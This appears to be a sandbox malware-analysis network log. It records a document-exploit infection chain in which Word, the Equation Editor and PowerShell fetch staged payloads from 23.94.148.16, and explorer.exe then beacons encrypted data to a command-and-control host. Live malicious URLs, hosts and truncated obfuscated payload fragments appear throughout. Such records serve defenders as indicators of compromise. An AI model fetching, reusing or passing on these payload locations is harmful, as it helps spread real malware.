1 | 192.168.2.22 | 49169 | 23.94.148.16 | 80 | 3692 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 15:51:12.993789911 CEST | 290 | OUT | HEAD /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: 23.94.148.16
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
Aug 31, 2024 15:51:13.479738951 CEST | 323 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:13 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:32:52 GMT
                                                      ETag: "19045-620dae4b80f82"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 102469
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49170 | 23.94.148.16 | 80 | 3996 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 15:51:13.763609886 CEST | 336 | OUT | GET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
Aug 31, 2024 15:51:14.246581078 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:13 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Fri, 30 Aug 2024 01:22:53 GMT
                                                      ETag: "2cb2c-620dc6e2b6890"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 183084
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: image/tiff
                                                      Data Raw: ff fe 0d 00 0a 00 61 00 4f 00 4c 00 68 00 4b 00 66 00 4c 00 71 00 4a 00 55 00 20 00 3d 00 20 00 22 00 5a 00 6e 00 66 00 4c 00 57 00 6d 00 43 00 63 00 47 00 6e 00 22 00 0d 00 0a 00 55 00 7a 00 70 00 75 00 4c 00 4e 00 4e 00 66 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 65 00 68 00 41 00 51 00 57 00 55 00 78 00 4c 00 4c 00 22 00 0d 00 0a 00 4c 00 63 00 67 00 4f 00 47 00 4b 00 6d 00 4b 00 63 00 4c 00 20 00 3d 00 20 00 22 00 48 00 62 00 4c 00 6b 00 4c 00 74 00 4c 00 57 00 63 00 51 00 22 00 0d 00 0a 00 76 00 63 00 55 00 73 00 66 00 6c 00 5a 00 52 00 6c 00 43 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 75 00 62 00 53 00 54 00 6b 00 4b 00 57 00 68 00 22 00 0d 00 0a 00 6b 00 4f 00 47 00 47 00 4a 00 41 00 6c 00 55 00 65 00 66 00 20 00 3d 00 20 00 22 00 5a 00 52 00 66 00 4b 00 7a 00 57 00 4c 00 5a 00 4a 00 62 00 22 00 0d 00 0a 00 55 00 7a 00 47 00 4f 00 68 00 62 00 69 00 57 00 57 00 55 00 20 00 3d 00 20 00 22 00 5a 00 68 00 69 00 4b 00 4a 00 4c 00 47 00 63 00 78 00 4c 00 22 00 0d 00 0a 00 52 00 4e 00 57 00 57 00 [TRUNCATED]
                                                      Data Ascii: aOLhKfLqJU = "ZnfLWmCcGn"UzpuLNNfKk = "OehAQWUxLL"LcgOGKmKcL = "HbLkLtLWcQ"vcUsflZRlC = "mLubSTkKWh"kOGGJAlUef = "ZRfKzWLZJb"UzGOhbiWWU = "ZhiKJLGcxL"RNWWPcWLpk = "inLcRaLORT"LJRHpWOLiA = "HANiCKKaoW"LlixubWiPa = "eCPxbZkAQc"caWilmiUZo = "PObfcPWtmW"pbnQmpoiKu = "QkZAvlIxcJ"PqiGNOkWuS = "uNUKciGpdh"UgnILezUit = "IWGcLuhWHk"oakCeoALzi = "PWZZKmAOlf"CNiPKnohse = "NGUqLdizGW"PcKPTWkeQL = "shNHbzkWTW"LNGLtAHidG = "khUhJAiZPW
Aug 31, 2024 15:51:14.246601105 CEST | 1236 | IN | Data Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 50 00 63 00 5a 00 57 00 68 00 61 00 55 00 61 00 51 00 73 00 20 00 3d 00 20 00 22 00 63 00 63 00 76 00 47 00 47 00 6b 00 48 00 47 00 54 00 66 00 22 00 0d 00 0a 00 7a 00 7a 00 6b 00 50 00 78 00 4c 00 4b 00 4e 00 47
                                                      Data Ascii: "PcZWhaUaQs = "ccvGGkHGTf"zzkPxLKNGC = "SUNZkCApGd"mUNkAGmWGa = "kitbcKLGKi"hUzaUBiiqN = "WahkeKItqC"kWenPSkG
Aug 31, 2024 15:51:14.246613026 CEST | 1236 | IN | Data Raw: 00 57 00 69 00 6b 00 69 00 41 00 70 00 62 00 63 00 6f 00 20 00 3d 00 20 00 22 00 69 00 6d 00 71 00 74 00 57 00 71 00 6b 00 6d 00 65 00 69 00 22 00 0d 00 0a 00 47 00 4a 00 65 00 66 00 63 00 67 00 4c 00 70 00 6b 00 57 00 20 00 3d 00 20 00 22 00 4c
                                                      Data Ascii: WikiApbco = "imqtWqkmei"GJefcgLpkW = "LmCnuhLqRq"eZKNsGLPNl = "fxhcLrkpAL"snPmZvWWSG = "xBrqGBbUAi"KzPWLLkiOo = "
Aug 31, 2024 15:51:14.246623993 CEST | 1236 | IN | Data Raw: 00 57 00 75 00 57 00 22 00 0d 00 0a 00 51 00 6f 00 6c 00 57 00 50 00 5a 00 53 00 7a 00 6e 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 75 00 47 00 4c 00 6d 00 47 00 69 00 6f 00 69 00 71 00 22 00 0d 00 0a 00 6d 00 65 00 5a 00 63 00 6c 00 41 00 74 00 78
                                                      Data Ascii: WuW"QolWPZSznZ = "LuGLmGioiq"meZclAtxgP = "ixfhdWNGWf"WPcAxtpLoT = "KobKveqcWv"cWfHpZiKLm = "cWbLiuZLiZ"xaOmBAo
Aug 31, 2024 15:51:14.246634960 CEST | 896 | IN | Data Raw: 00 42 00 78 00 65 00 4c 00 65 00 73 00 47 00 69 00 55 00 47 00 22 00 0d 00 0a 00 57 00 4b 00 6c 00 65 00 49 00 4e 00 68 00 4f 00 4b 00 4e 00 20 00 3d 00 20 00 22 00 66 00 50 00 57 00 7a 00 70 00 4b 00 5a 00 73 00 4c 00 63 00 22 00 0d 00 0a 00 42
                                                      Data Ascii: BxeLesGiUG"WKleINhOKN = "fPWzpKZsLc"BkdWcZKKoh = "zvzCKCLZoW"CmCGKLRnOL = "GLxUkjKfiL"CWhczLJZlf = "bLWdLGKqUU"
Aug 31, 2024 15:51:14.246644020 CEST | 1236 | IN | Data Raw: 00 0a 00 55 00 65 00 4b 00 65 00 43 00 62 00 4e 00 43 00 75 00 75 00 20 00 3d 00 20 00 22 00 54 00 47 00 4b 00 4c 00 47 00 74 00 70 00 4b 00 47 00 55 00 22 00 0d 00 0a 00 47 00 78 00 52 00 4c 00 73 00 6f 00 47 00 57 00 4c 00 4b 00 20 00 3d 00 20
                                                      Data Ascii: UeKeCbNCuu = "TGKLGtpKGU"GxRLsoGWLK = "LaWsconZGc"TULuCcNAbU = "fsKzKWGlCO"rxLWiIcKxu = "ZRBtjkkWUq"UPHWGrALKk =
Aug 31, 2024 15:51:14.246649027 CEST | 1236 | IN | Data Raw: 00 69 00 53 00 75 00 4b 00 47 00 4f 00 4f 00 4b 00 65 00 57 00 22 00 0d 00 0a 00 55 00 50 00 51 00 47 00 75 00 48 00 4e 00 69 00 4c 00 4f 00 20 00 3d 00 20 00 22 00 7a 00 4c 00 41 00 47 00 4c 00 6e 00 66 00 57 00 78 00 41 00 22 00 0d 00 0a 00 47
                                                      Data Ascii: iSuKGOOKeW"UPQGuHNiLO = "zLAGLnfWxA"GsKRPiCONh = "UneTLkKgqi"AKcLZocKiG = "uLcLRLcecO"NKKWLWNtWK = "kvxKbhSLff"
Aug 31, 2024 15:51:14.246659994 CEST | 448 | IN | Data Raw: 00 6b 00 4c 00 65 00 6b 00 22 00 0d 00 0a 00 64 00 4a 00 65 00 4c 00 7a 00 61 00 65 00 52 00 78 00 7a 00 20 00 3d 00 20 00 22 00 74 00 72 00 68 00 4e 00 41 00 69 00 69 00 57 00 57 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 61 00 64 00 4b 00 4b 00 4c
                                                      Data Ascii: kLek"dJeLzaeRxz = "trhNAiiWWi"adKKLhQGZA = "otLiHmeWLZ"lOpdWtldLi = "NcBhaZRWfi"KUCoxqiGuf = "vdGiqlxnmi"ohtK
Aug 31, 2024 15:51:14.246673107 CEST | 1236 | IN | Data Raw: 00 0a 00 55 00 71 00 53 00 66 00 4c 00 5a 00 64 00 57 00 66 00 4a 00 20 00 3d 00 20 00 22 00 63 00 43 00 50 00 4f 00 63 00 41 00 57 00 61 00 7a 00 6e 00 22 00 0d 00 0a 00 4b 00 42 00 68 00 6f 00 4c 00 4e 00 55 00 69 00 55 00 63 00 20 00 3d 00 20
                                                      Data Ascii: UqSfLZdWfJ = "cCPOcAWazn"KBhoLNUiUc = "PJhnUczhGP"oWhnLzljWz = "HGZKZKWuLm"eULLCkGZCo = "aUUmdlLNcx"SRZpqbGxkP
Aug 31, 2024 15:51:14.246681929 CEST | 224 | IN | Data Raw: 00 47 00 6f 00 4b 00 42 00 55 00 20 00 3d 00 20 00 22 00 57 00 6c 00 65 00 47 00 57 00 4e 00 57 00 7a 00 70 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 57 00 72 00 6e 00 69 00 62 00 4b 00 66 00 52 00 6e 00 66 00 20 00 3d 00 20 00 22 00 63 00 6b 00 68
                                                      Data Ascii: GoKBU = "WleGWNWzpL"WrnibKfRnf = "ckhlcWUjdx"TkfLWnGvkC = "tPUdfoGxfi"PPfQadiUpq = "UiAALNKvaI"iICPiAL
Aug 31, 2024 15:51:14.251570940 CEST | 1236 | IN | Data Raw: 00 4c 00 6b 00 4b 00 20 00 3d 00 20 00 22 00 72 00 4c 00 61 00 4c 00 5a 00 41 00 71 00 4b 00 62 00 6f 00 22 00 0d 00 0a 00 47 00 4b 00 65 00 78 00 69 00 75 00 69 00 43 00 47 00 74 00 20 00 3d 00 20 00 22 00 68 00 42 00 62 00 5a 00 47 00 6b 00 4e
                                                      Data Ascii: LkK = "rLaLZAqKbo"GKexiuiCGt = "hBbZGkNcHK"uJULlKhdeK = "cHcaNCGKWW"GbLKLBdhvO = "WoLlhGnLLd"fLPiaUthjW = "cKpiKW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49172 | 23.94.148.16 | 80 | 2892 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 31, 2024 15:51:21.559240103 CEST | 73 | OUT | GET /90/WEFV.txt HTTP/1.1
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
Aug 31, 2024 15:51:22.031624079 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:21 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:16:31 GMT
                                                      ETag: "c558-620daaa44438d"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 50520
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/plain
                                                      Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                      Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 15:51:22.031649113 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 15:51:22.031666040 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 15:51:22.031677961 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 15:51:22.031696081 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Aug 31, 2024 15:51:22.031708002 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031719923 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031739950 CEST | 1000 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031750917 CEST | 1236 | IN | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031764984 CEST | 1236 | IN | Data Raw: 73 6b 63 62 79 6a 54 57 6a 2f 31 32 5a 4e 6d 58 62 68 31 59 73 68 33 30 69 64 52 74 52 55 35 46 2b 69 54 49 56 30 39 6b 39 79 6c 78 5a 47 2f 6d 6c 77 59 48 74 63 57 43 62 31 53 4e 53 45 41 46 39 4b 5a 2f 47 38 74 45 6a 62 5a 5a 64 4d 62 6c 37 41
                                                      Data Ascii: skcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNxWVN+UbCRZ3D02qZ108LzPpQZbLUCHlMBOt2lynKxVufSLRGxuTWNFfK1YlKywbvtIRcKVbsCgU0j5aVAPpNkjnFRTQslVjD1GB7lS1Ig
                                                      Aug 31, 2024 15:51:22.036585093 CEST | 1236 | IN | Data Raw: 44 63 44 79 47 4f 68 45 6a 6e 76 6f 2b 50 2b 56 45 47 74 5a 77 64 31 73 6f 50 57 36 62 6b 57 38 53 4d 47 54 46 6a 44 4d 66 4e 46 56 43 4e 59 56 57 4f 77 33 47 65 2b 62 41 51 58 65 53 37 79 44 30 41 72 32 47 4f 2b 4c 43 37 36 6a 43 66 6e 4d 33 78
                                                      Data Ascii: DcDyGOhEjnvo+P+VEGtZwd1soPW6bkW8SMGTFjDMfNFVCNYVWOw3Ge+bAQXeS7yD0Ar2GO+LC76jCfnM3xy7TMQwjezhF8++kOi1i2ulrsn7jN46zEuv2bzTGmatYxQa2E6cJCHsklfQTU++nfReZD0kUP6o4FySiO0CYtuzwyFITKmwkNP4mVsIdgFlDFKtUOdEaR1VewlUlIxUjGDFNN2mj2lV1ajWSUaArtNVRtwxXPjiZqy


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.22 | 49173 | 185.251.91.119 | 80 | 1244 | C:\Windows\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 31, 2024 15:51:44.381592035 CEST | 276 | OUT | POST /index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://wrbvhkkkwfg.com/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 275
                                                      Host: prolinice.ga
                                                      Aug 31, 2024 15:51:44.381608963 CEST | 275 | OUT | Data Raw: 6e e2 97 fb c0 4d f4 65 6e 17 bf 60 4f 5e f9 8e d8 51 ec 5b 45 88 c9 9f f2 e1 7d 18 dc 4d 40 05 40 b1 ea b8 0a df 82 a5 67 be c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                                      Data Ascii: nMen`O^Q[E}M@@g0&7H8.6hEvRY;PLel|&4]$^Y927LKi6=^I*jSom{"3y"pAyPM9|CKI+9sA.)q70lb;
                                                      Aug 31, 2024 15:51:45.412688971 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      date: Sat, 31 Aug 2024 13:51:45 GMT
                                                      server: Apache/2.4.59 (Debian)
                                                      transfer-encoding: chunked
                                                      content-type: text/html; charset=utf-8
                                                      Data Raw: 33 37 44 33 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 [TRUNCATED]
                                                      Data Ascii: 37D3_'*S)]?,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z [TRUNCATED]
                                                      Aug 31, 2024 15:51:45.412708998 CEST | 1236 | IN | Data Raw: f0 d3 5f c4 6b 30 c1 8f 61 0c bd 9f d9 57 2c d9 78 71 c3 ed 95 1c 57 62 73 a5 f6 ba 18 ea 07 01 95 65 ac 19 bf f4 04 76 fe 6d 42 8c 13 15 48 2c 63 3a fe 6c 25 54 4d 30 85 30 92 ad 37 23 ec 06 31 91 f0 16 ff a2 b3 e1 cd 3c d6 3f 9c 79 ef 0e 00 cb
                                                      Data Ascii: _k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/
